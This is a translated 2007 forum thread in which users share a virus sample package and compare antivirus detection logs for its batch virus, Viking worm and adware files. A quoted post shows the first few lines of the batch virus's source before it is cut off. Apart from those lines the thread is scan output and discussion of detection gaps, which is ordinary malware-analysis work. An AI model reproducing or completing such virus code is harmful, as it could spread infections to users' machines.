Original poster: qiqi00612

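[Virus sample] It's been weeks and MKF still can't detect this virus! This is the complete version of the virus-killing virus I posted last time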

qiqi00612
 OP | Posted on 2007-5-17 00:35:08
Originally posted by 小邪邪 on 2007-5-17 00:16
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.s ...

....What is that...
wangjay1980
Posted on 2007-5-17 00:39:22
deleted: adware not-a-virus:AdWare.Win32.NewDotNet        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
deleted: riskware not-a-virus:AdTool.Win32.WhenU.a        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0019.BIN
deleted: adware not-a-virus:AdWare.Win32.Relevant.a        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
deleted: adware not-a-virus:AdWare.Win32.WebSearch.aj        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
disinfected: virus Worm.Win32.Viking.jl        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\eyviewer.exe
deleted: adware not-a-virus:AdWare.Win32.Comet.bb        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\horoscopes.exe//data0011
deleted: adware not-a-virus:AdWare.Win32.Comet.be        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\horoscopes.exe//data0012
deleted: adware not-a-virus:AdWare.Win32.Beginto.f        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\searchtool.dll
deleted: adware not-a-virus:AdWare.Win32.Comet.be        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\setup.exe
deleted: adware not-a-virus:AdWare.Win32.SafeSurfing.aa        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\slimjunn.exe
deleted: virus Virus.BAT.Agent.b        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\u.bat
qiqi00612
 OP | Posted on 2007-5-17 00:42:45
Originally posted by wangjay1980 on 2007-5-17 00:33
detected: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\×ÀÃæ\u.rar/u.bat

Kaspersky reported these....
已删除: 广告程序 not-a-virus:AdWare.Win32.NewDotNet 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.Relevant.a 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.WebSearch.aj 文件: F:\桌面\Upang\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
已清除: 病毒 Worm.Win32.Viking.jl 文件: F:\桌面\Upang\Upang\viurs\eyviewer.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.bb 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0011
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0012
已删除: 广告程序 not-a-virus:AdWare.Win32.Beginto.f 文件: F:\桌面\Upang\Upang\viurs\searchtool.dll
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\setup.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.SafeSurfing.aa 文件: F:\桌面\Upang\Upang\viurs\slimjunn.exe
已删除: 病毒 Virus.BAT.Agent.b 文件: F:\桌面\Upang\Upang\viurs\u.bat
Among them, MKF still doesn't seem to detect that Viking.jl even now...


PS: This post doesn't count... It clearly errored out, yet it still got posted!

[ Last edited by qiqi00612 on 2007-5-17 00:48 ]
qiqi00612
 OP | Posted on 2007-5-17 00:46:33
Originally posted by wangjay1980 on 2007-5-17 00:33
detected: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\×ÀÃæ\u.rar/u.bat

This is what Kaspersky found. One of them is viking.jl; MKF can't detect it, so it won't be fun for anyone who gets infected....
8bye.txt
AUTOEXEC.bat
autorun.inf
u.vbs
eyviewer.exe
desktop.ini
Kaspersky does not flag the ones above!!!
已删除: 广告程序 not-a-virus:AdWare.Win32.NewDotNet 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.Relevant.a 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.WebSearch.aj 文件: F:\桌面\Upang\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
已清除: 病毒 Worm.Win32.Viking.jl 文件: F:\桌面\Upang\Upang\viurs\eyviewer.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.bb 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0011
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0012
已删除: 广告程序 not-a-virus:AdWare.Win32.Beginto.f 文件: F:\桌面\Upang\Upang\viurs\searchtool.dll
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\setup.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.SafeSurfing.aa 文件: F:\桌面\Upang\Upang\viurs\slimjunn.exe
已删除: 病毒 Virus.BAT.Agent.b 文件: F:\桌面\Upang\Upang\viurs\u.bat
qiqi00612
 OP | Posted on 2007-5-17 00:49:30
Originally posted by wangjay1980 on 2007-5-17 00:39
deleted: adware not-a-virus:AdWare.Win32.NewDotNet        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropp ...

Which antivirus did you scan with??? Why is it garbled???
zane_xzz
Posted on 2007-5-17 00:54:56
McAfee is just like this, dragging its feet
qiqi00612
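 OP | Posted on 2007-5-17 01:41:48
Originally posted by zane_xzz on 2007-5-17 00:54
McAfee is just like this, dragging its feet

Agreed! I'm going to bed; I'll check again tomorrow to see whether it gets detected!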
playx
Posted on 2007-5-17 04:58:57
u.rar submitted... The detections for Upang are below.. not sure whether anything was missed; will submit again if so


Avira
Start of the scan: 2007年5月17日 星期四  05:03

Starting the file scan:

Begin scan in 'C:\download\Upang'
C:\download\Upang\viurs\eyviewer.exe
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      A backup was created as '46c171fe.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\horoscopes.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      A backup was created as '46bd71f4.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\setup.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      A backup was created as '46bf71ea.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      A backup was created as '46ad71b3.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!

[ Last edited by playx on 2007-5-17 05:07 ]
mofunzone
Posted on 2007-5-17 06:22:19
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\u'
C:\Documents and Settings\morgan\My Documents\u\
  u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\viurs'
C:\Documents and Settings\morgan\My Documents\viurs\
  8bye.txt
  angelinajoliedt.exe
  AUTOEXEC.BAT
  autorun.inf
  desktop.ini
  ebayshop.exe
    [0] Archive type: RAR SFX (self extracting)
    --> EbayShop\ebay.ico
    --> EbayShop\EbayShop.exe
    --> EbayShop\EbayShopSetup.exe
        [DETECTION] Contains signature of the Ad- or Spyware ADSPY/WebSearch.AJ.4
        [WARNING]   Infected files in archives cannot be repaired!
    --> EbayShop\EbayShopUnwise.exe
    --> EbayShop\setup.ini
        [INFO]      The file was deleted!
  eyviewer.exe
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      The file was deleted!
  horoscopes.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      The file was deleted!
  searchtool.dll
      [DETECTION] Contains signature of the Ad- or Spyware ADSPY/SmartShopper
      [INFO]      The file was deleted!
  setup.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      The file was deleted!
  slimjunn.exe
      [DETECTION] Contains signature of the Ad- or Spyware ADSPY/SafeSurfing.AA
      [INFO]      The file was deleted!
  u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was deleted!
  u.vbe


End of the scan: 2007年5月16日  15:22
Used time: 00:11 min

The scan has been done completely.

      2 Scanning directories
     19 Files were scanned
      8 viruses and/or unwanted programs were found
      0 classified as suspicious:
      8 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     11 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
      0 Hidden objects were found
playx
Posted on 2007-5-17 16:30:18
Reply received after submitting..



We have analyzed your submission.  The following is a report of our
findings for each file you have submitted:

filename:  u.rar
machine: Machine
result: See the developer notes

filename: u.bat
machine: Machine
result: This file is detected as W32.Uisgon.B.  

Developer notes:
u.rar is an infected container file of type  RAR
u.bat is non-repairable threat. Please delete this file and replace it
if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   u.rar

[ Last edited by playx on 2007-5-17 16:39 ]